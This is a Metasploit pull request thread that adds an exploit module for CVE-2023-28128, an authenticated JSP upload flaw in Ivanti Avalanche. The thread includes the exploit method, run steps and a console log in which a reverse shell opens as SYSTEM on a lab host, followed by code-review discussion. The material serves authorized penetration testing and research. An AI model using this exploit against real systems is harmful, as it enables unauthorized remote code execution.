Add exploit for Ivanti Avalanche file upload
rapid7/metasploit-framework pull request #17979
Opened 2023-05-10 14:29 UTC by space-r7

This adds an exploit module for an authenticated file upload vulnerability in versions below `v6.4.0.186` of Ivanti Avalanche.

Vulnerable versions of Ivanti Avalanche permit MS-DOS style short names in the configuration path for the Central FileStore. Because of this, an administrator can change the default path to the web root of the applications, upload a JSP file, and achieve RCE as `NT AUTHORITY\SYSTEM`.

## Verification

- [ ] Start `msfconsole`
- [ ] Do: `use exploit/windows/http/ivanti_avalanche_filestoreconfig_upload`
- [ ] Do: `set USERNAME <uname>`
- [ ] Do: `set PASSWORD <pass>`
- [ ] Do: `set RHOST <ip>`
- [ ] Do: `run`
- [ ] You should get a shell as `NT AUTHORITY\SYSTEM`.

## Scenarios

```
msf6 > use exploit/windows/http/ivanti_avalanche_filestoreconfig_upload
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(windows/http/ivanti_avalanche_filestoreconfig_upload) > set rhost 192.168.140.150
rhost => 192.168.140.150
msf6 exploit(windows/http/ivanti_avalanche_filestoreconfig_upload) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(windows/http/ivanti_avalanche_filestoreconfig_upload) > options

Module options (exploit/windows/http/ivanti_avalanche_filestoreconfig_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin            yes       Password to log in with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.140.150  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics
                                         /using-metasploit.html
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /AvalancheWeb    yes       The URI of the Example Application
   USERNAME   amcadmin         yes       User name to log in with
   VHOST                       no        HTTP server virtual host

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.140.1    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

View the full module info with the info, or info -d command.

msf6 exploit(windows/http/ivanti_avalanche_filestoreconfig_upload) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Original FileStore config path: 'C:\Program Files\Wavelink\Avalanche\EnterpriseServer\centralfilestore\files'
[*] Changing FileStore config path to 'C:\PROGRA~1\Wavelink\AVALAN~1\Web'
[+] Successfully uploaded 'LWRrxDXWxhbz.jsp'
[*] Attempting to restore config path
[!] Tried to delete webapps/LWRrxDXWxhbz.jsp, unknown result
[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.150:50249) at 2023-05-08 14:27:58 -0500
[!] Failed to restore the FileStore config path to its original path. Please manually restore it.
[+] Successfully restored the FileStore config path

Shell Banner:
Microsoft Windows [Version 10.0.19041.630]
-----

C:\Program Files\Wavelink\Avalanche\Web>
C:\Program Files\Wavelink\Avalanche\Web>
C:\Program Files\Wavelink\Avalanche\Web>whoami
whoami
nt authority\system

C:\Program Files\Wavelink\Avalanche\Web>^C
Abort session 1? [y/N]  y

[*] 192.168.140.150 - Command shell session 1 closed.  Reason: User exit
```

2023-05-10 23:20 UTC, gwillcox-r7 reviewed
A few points to consider here. Finished review at line 99 of the code, will pick this up tomorrow.

2023-05-10 23:20 UTC, gwillcox-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +    fail_with(Failure::UnexpectedReply, 'Failed to access login page') unless res&.body&.include?('Login')
Again same point as above, this check seems too generic and not specific enough to an Ivanti Avalanche target specifically.

Additionally we aren't checking res's code here which would be advisable.

2023-05-11 14:55 UTC, cdelafuente-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +        'Platform' => ['win'],
I believe using the `java` platform would bring more payload options: 
```suggestion
        'Platform' => ['win', 'java'],
```

- Before
```
msf6 exploit(windows/http/ivanti_avalanche_filestoreconfig_upload) > show payloads

Compatible Payloads
===================

   #  Name                                Disclosure Date  Rank    Check  Description
   -  ----                                ---------------  ----    -----  -----------
   0  payload/generic/custom                               normal  No     Custom Payload
   1  payload/generic/shell_bind_tcp                       normal  No     Generic Command Shell, Bind TCP Inline
   2  payload/generic/shell_reverse_tcp                    normal  No     Generic Command Shell, Reverse TCP Inline
   3  payload/generic/ssh/interact                         normal  No     Interact with Established SSH Connection
   4  payload/java/jsp_shell_bind_tcp                      normal  No     Java JSP Command Shell, Bind TCP Inline
   5  payload/java/jsp_shell_reverse_tcp                   normal  No     Java JSP Command Shell, Reverse TCP Inline
```

- after
```
msf6 exploit(windows/http/ivanti_avalanche_filestoreconfig_upload) > show payloads

Compatible Payloads
===================

   #   Name                                     Disclosure Date  Rank    Check  Description
   -   ----                                     ---------------  ----    -----  -----------
   0   payload/generic/custom                                    normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/generic/ssh/interact                              normal  No     Interact with Established SSH Connection
   4   payload/java/jsp_shell_bind_tcp                           normal  No     Java JSP Command Shell, Bind TCP Inline
   5   payload/java/jsp_shell_reverse_tcp                        normal  No     Java JSP Command Shell, Reverse TCP Inline
   6   payload/java/meterpreter/bind_tcp                         normal  No     Java Meterpreter, Java Bind TCP Stager
   7   payload/java/meterpreter/reverse_http                     normal  No     Java Meterpreter, Java Reverse HTTP Stager
   8   payload/java/meterpreter/reverse_https                    normal  No     Java Meterpreter, Java Reverse HTTPS Stager
   9   payload/java/meterpreter/reverse_tcp                      normal  No     Java Meterpreter, Java Reverse TCP Stager
   10  payload/java/shell/bind_tcp                               normal  No     Command Shell, Java Bind TCP Stager
   11  payload/java/shell/reverse_tcp                            normal  No     Command Shell, Java Reverse TCP Stager
   12  payload/java/shell_reverse_tcp                            normal  No     Java Command Shell, Reverse TCP Inline
   13  payload/multi/meterpreter/reverse_http                    normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   14  payload/multi/meterpreter/reverse_https                   normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
```

2023-05-11 18:26 UTC, space-r7 commented on documentation/modules/exploit/windows/http/ivanti_avalanche_filestoreconfig_upload.md
> +can change the default path for the Central FileStore. While the default path
Noted that it's in the config pane in the latest commit.

2023-05-11 18:27 UTC, space-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +    end
Yep, I think the `Avalanche - User Login` should be more specific

2023-05-11 20:56 UTC, gwillcox-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +    end
Sounds good, thanks for updating this!

2023-05-11 21:04 UTC, gwillcox-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +    fail_with(Failure::UnexpectedReply, 'Failed to access login page') unless res&.body&.include?('Login')
The check here is fixed but still a bit concerned about the lack of response code checks throughout the code. You seem to just be checking that the response body matches what you are expecting?

2023-05-11 21:32 UTC, space-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +    fail_with(Failure::UnexpectedReply, 'Failed to access login page') unless res&.body&.include?('Login')
I don't typically validate on response codes unless the returned code is helpful in determining exploitability or if the results of a request varies much. Otherwise, yea, I normally just check what's returned in the response body.

2023-05-11 23:24 UTC, gwillcox-r7 requested changes

2023-05-11 23:24 UTC, gwillcox-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +    fail_with(Failure::UnexpectedReply, 'Failed to change FileStore config path') unless res&.body&.include?(new_config_path)
Is this wrapped in anything more specific such as a tag or similar we can match on?

2023-05-11 23:24 UTC, gwillcox-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +    expand_dir = results.find { |result| result.at('td').text.strip == dir_name }
```suggestion
    expand_dir = results.find { |result| result&.at('td')&.text&.strip == dir_name }
```

Safe navigation here would be ideal given there is no guarantee the response will contain a `td` element.

2023-05-11 23:24 UTC, gwillcox-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +    fail_with(Failure::UnexpectedReply, 'Failed to get value to expand \'webapps\' directory') unless data_rk
This seems like it should be updated to print out the requested directory name for expansion and that `webapps` is an old value? I only say that as you also call this function with `AvalancheWeb` as the `dir_name` parameter value.

```suggestion
    fail_with(Failure::UnexpectedReply, "Failed to get value to expand #{dir_name} directory") unless data_rk
```

2023-05-11 23:24 UTC, gwillcox-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +        'fileStoreTree_dlgFileStoreTree' => 'fileStoreTree_dlgFileStoreTree',
Suggestion: Given this value is repeated 6 times in your code, of which 4 instances are in this function alone, it may be an idea to define this as a variable to prevent instantiating the same string multiple times.

This isn't a required edit and is more of a slight performance tweak so feel free to ignore.

2023-05-11 23:24 UTC, gwillcox-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +    fail_with(Failure::UnexpectedReply, 'Failed to access updated FileStore page') unless res&.body&.include?('FileStore')
See above point on the use of `FileStore` word as the only check. This also applies here.

2023-05-12 18:29 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/http/ivanti_avalanche_filestoreconfig_upload.md
> +Instructions for installing Ivanti Avalanche can be found [here](https://forums.ivanti.com/s/article/Best-Known-Method-for-installing-Avalanche-6-x-using-MSSQL-Server-2008-R2-Express-DB-or-2012-Expre
In SQL Server 2019 I had to follow this and also do the following:

SQL Server Configuration Manager -> SQL Server Network Configuration -> Protocols for MSSQLSERVER -> TCP/IP -> Change from Disable to Enabled.

Then go to SQL Server Configuration Manager -> SQL Server Services -> Stop all Services -> Start just the SQL Server (MSSQLSERVER) service.

Then had to go into SQL Server Management Tool, connect using Windows Authentication, find the SQL server and go to:

Security->Logins->sa-> Right click -> Select Properties -> Status -> Toggle Login to Enabled -> Ok

Also had to set a password for the `sa` account by executing the statement `ALTER LOGIN sa WITH PASSWORD = 'theSAUser123';` or similar once logged in.

Only then would the installer correctly set things up using port 1433 without errors. Otherwise without this by default only port 1434 is open which appears to work but then keeps getting timeout errors.

2023-05-12 18:42 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/http/ivanti_avalanche_filestoreconfig_upload.md
> +Instructions for installing Ivanti Avalanche can be found [here](https://forums.ivanti.com/s/article/Best-Known-Method-for-installing-Avalanche-6-x-using-MSSQL-Server-2008-R2-Express-DB-or-2012-Expre
Additionally the actual install is different from the instructions listed in the link here slightly (sorry for earlier comment as I realized some of this is explained in the doc), in that you may also need to enable the Tomcat HTTP and HTTPS connectors which are not enabled by default it seems on the installer?

Just something I noticed different 🤷

2023-05-12 19:00 UTC, gwillcox-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +      fail_with(Failure::UnexpectedReply, "Could not access FileStore config. #{restore_msg}")
There is a bit of a edge case here. The `cleanup` function will be called by the `check` method, so this will cause errors due to the use of `fail_with` in a call path that comes from `check`.

2023-05-12 19:02 UTC, gwillcox-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +    fail_with(Failure::UnexpectedReply, "Failed to get view state. #{restore_msg}") unless view_state
There is a bit of a edge case here. The cleanup function will be called by the `check` method, so this will cause errors due to the use of `fail_with` in a call path that comes from `check`.

2023-05-12 19:15 UTC, gwillcox-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +    fail_with(Failure::UnexpectedReply, "Failed to get view state. #{restore_msg}") unless view_state
Fixed in https://github.com/rapid7/metasploit-framework/pull/17979/commits/3b2d23eeae49f14033a1b96468a248d4bad7c40e

2023-05-12 19:15 UTC, gwillcox-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +    fail_with(Failure::UnexpectedReply, 'Failed to get value to expand \'webapps\' directory') unless data_rk
Fixed in https://github.com/rapid7/metasploit-framework/pull/17979/commits/3b2d23eeae49f14033a1b96468a248d4bad7c40e

2023-05-12 19:16 UTC, gwillcox-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +    expand_dir = results.find { |result| result.at('td').text.strip == dir_name }
Fixed in https://github.com/rapid7/metasploit-framework/pull/17979/commits/3b2d23eeae49f14033a1b96468a248d4bad7c40e

2023-05-12 19:16 UTC, gwillcox-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +    fail_with(Failure::UnexpectedReply, 'Couldn\'t determine drive letter for path') unless drive_letter&.length&.> 1
Fixed in https://github.com/rapid7/metasploit-framework/pull/17979/commits/3b2d23eeae49f14033a1b96468a248d4bad7c40e

2023-05-12 19:16 UTC, gwillcox-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state') unless view_state
Made each of these error messages unique with https://github.com/rapid7/metasploit-framework/pull/17979/commits/3b2d23eeae49f14033a1b96468a248d4bad7c40e.

2023-05-12 19:16 UTC, gwillcox-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +    unless res&.code == 302 && res&.headers&.[]('Location')&.include?('inventory.jsf')
Fixed this in https://github.com/rapid7/metasploit-framework/pull/17979/commits/3b2d23eeae49f14033a1b96468a248d4bad7c40e

2023-05-12 19:20 UTC, gwillcox-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +    CheckCode::Detected
Updated the check code logic in https://github.com/rapid7/metasploit-framework/pull/17979/commits/3b2d23eeae49f14033a1b96468a248d4bad7c40e which should help address this issue.

2023-05-12 19:28 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/http/ivanti_avalanche_filestoreconfig_upload.md
> +Instructions for installing Ivanti Avalanche can be found [here](https://forums.ivanti.com/s/article/Best-Known-Method-for-installing-Avalanche-6-x-using-MSSQL-Server-2008-R2-Express-DB-or-2012-Expre
Added a bit more documentation with ea988f0c7869c0a060cdcbab6f3b4a4d157c287c in case the linked documentation goes down.

2023-05-12 21:09 UTC, gwillcox-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +    fail_with(Failure::UnexpectedReply, 'Failed to access updated FileStore page') unless res&.body&.include?('FileStore')
Fixed with https://github.com/rapid7/metasploit-framework/pull/17979/commits/560fc9000bae250374032d1a544c889613a59c96

2023-05-12 21:09 UTC, gwillcox-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +    fail_with(Failure::UnexpectedReply, 'Failed to change FileStore config path') unless res&.body&.include?(new_config_path)
Fixed with https://github.com/rapid7/metasploit-framework/pull/17979/commits/560fc9000bae250374032d1a544c889613a59c96

2023-05-12 21:09 UTC, gwillcox-r7 commented on modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
> +    unless res && res.body.include?('FileStore')
Fixed with https://github.com/rapid7/metasploit-framework/pull/17979/commits/560fc9000bae250374032d1a544c889613a59c96

2023-05-12 21:10 UTC, gwillcox-r7 commented
This should be good to land once tests pass, thanks @space-r7!

2023-05-12 21:40 UTC, gwillcox-r7 commented
@msjenkins-r7 Test this please!

2023-05-15 22:50 UTC, gwillcox-r7 commented
@msjenkins-r7 Test this please

2023-05-16 14:18 UTC, gwillcox-r7 approved these changes

2023-05-16 14:21 UTC, merged

2023-05-16 14:23 UTC, gwillcox-r7 commented
# Release Notes
A exploit has been added for CVE-2023-28128, an authenticated file upload vulnerability in versions below v6.4.0.186 of Ivanti Avalanche that allows authenticated administrators to change the default path to the web root of the applications, upload a JSP file, and achieve RCE as `NT AUTHORITY\SYSTEM`. This occurs due to an bug whereby Ivanti Avalanche doesn't properly validate MS-DOS style short names in the configuration path.